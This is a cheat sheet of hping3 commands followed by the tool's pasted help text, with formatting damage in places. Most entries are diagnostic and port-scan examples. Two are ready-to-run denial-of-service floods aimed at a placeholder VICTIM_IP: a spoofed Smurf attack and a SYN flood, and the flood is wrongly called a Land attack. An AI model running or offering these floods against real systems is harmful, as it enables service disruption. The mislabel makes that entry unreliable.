Test with Hping3
- Testing ICMP:
hping3 -1 test.com
- Traceroute using ICMP:
hping3 --traceroute -V -1 test.com
- Checking port:
hping3 -V -S -p 80 -s 5050 test.com
- Traceroute to a determined port:
hping3 --traceroute -V -S -p 80 -s 5050 test.com
- Other types of ICMP:
hping3 -c 1 -V -1 -C 17 test.com
- Other types of Port Scanning:
hping3 -c 1 -V -p 80 -s 5050 -F test.com
- Ack Scan:
hping3 -c 1 -V -p 80 -s 5050 -A test.com
- Xmas Scan:
hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF test.com
- Null Scan:
hping3 -c 1 -V -p 80 -s 5050 -Y test.com
- Smurf Attack:
hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
- DOS Land Attack:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP --flood: sent packets as fast as possible. Don't show replies. --rand-dest: random destionation address mode. see the man. -V <-- Verbose -c --count: packet count -d --data: data size -S --syn: set SYN flag -w --win: winsize (default 64) -p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec -s --baseport: base source port (default random)
Hping3 how to use:
usage: hping3 host [options]
-h
–help show this help-v
–version show version-c
–count packet count-i
–interval wait (uX for X microseconds, for example -i u1000)--fast
alias for -i u10000 (10 packets for second)--faster
alias for -i u1000 (100 packets for second)--flood
sent packets as fast as possible. Don’t show replies.-n
–numeric numeric output-q
–quiet quiet-I
–interface interface name (otherwise default routing interface)-V
–verbose verbose mode-D
–debug debugging info-z
–bind bind ctrl+z to ttl (default to dst port)-Z
–unbind unbind ctrl+z--beep
beep for every matching packet received
Mode (default mode TCP)
-0 --rawip
RAW IP mode-1 --icmp
ICMP mode-2 --udp
UDP mode-8 --scan
SCAN mode.-9 --listen
listen mode
IP
-a --spoof
spoof source address--rand-dest
random destionation address mode. see the man.--rand-source
random source address mode. see the man.-t --ttl
ttl (default 64)-N --id
id (default random)-W --winid
use win* id byte ordering-r --rel
relativize id field (to estimate host traffic)-f --frag
split packets in more frag. (may pass weak acl)-x --morefrag
set more fragments flag-y --dontfrag
set dont fragment flag-g --fragoff
set the fragment offset-m --mtu
set virtual mtu, implies –frag if packet size > mtu-o --tos
type of service (default 0x00), try –tos help-G --rroute
includes RECORD_ROUTE option and display the route buffer--lsrr
loose source routing and record route--ssrr
strict source routing and record route-H --ipproto
set the IP protocol field, only in RAW IP mode
ICMP
-C --icmptype
icmp type (default echo request)-K --icmpcode
icmp code (default 0)--force-icmp
send all icmp types (default send only supported types)--icmp-gw
set gateway address for ICMP redirect (default 0.0.0.0)--icmp-ts
Alias for –icmp –icmptype 13 (ICMP timestamp)--icmp-addr
Alias for –icmp –icmptype 17 (ICMP address subnet mask)--icmp-help
display help for others icmp options
UDP/TCP
-s --baseport
base source port (default random)-p --destport
[+][+]destination port(default 0) ctrl+z inc/dec -k --keep
keep still source port-w --win
winsize (default 64)-O --tcpoff
set fake tcp data offset (instead of tcphdrlen / 4)-Q --seqnum
shows only tcp sequence number-b --badcksum
(try to) send packets with a bad IP checksum many systems will fix the IP checksum sending the packet so you’ll get bad UDP/TCP checksum instead.-M --setseq
set TCP sequence number-L --setack
set TCP ack-F --fin
set FIN flag-S --syn
set SYN flag-R --rst
set RST flag-P --push
set PUSH flag-A --ack
set ACK flag-U --urg
set URG flag-X --xmas
set X unused flag (0x40)-Y --ymas
set Y unused flag (0x80)--tcpexitcode
use last tcp->th_flags as exit code--tcp-timestamp
enable the TCP timestamp option to guess the HZ/uptime
Common
-d --data
data size (default is 0)-E --file
data from file-e --sign
add ‘signature’-j --dump
dump packets in hex-J --print
dump printable characters-B --safe
enable ‘safe’ protocol-u --end
tell you when –file reached EOF and prevent rewind-T --traceroute
traceroute mode (implies –bind and –ttl 1)--tr-stop
Exit when receive the first not ICMP in traceroute mode--tr-keep-ttl
Keep the source TTL fixed, useful to monitor just one hop--tr-no-rtt
Don’t calculate/show RTT information in traceroute mode
ARS packet description
--apd-send
Send the packet described with APD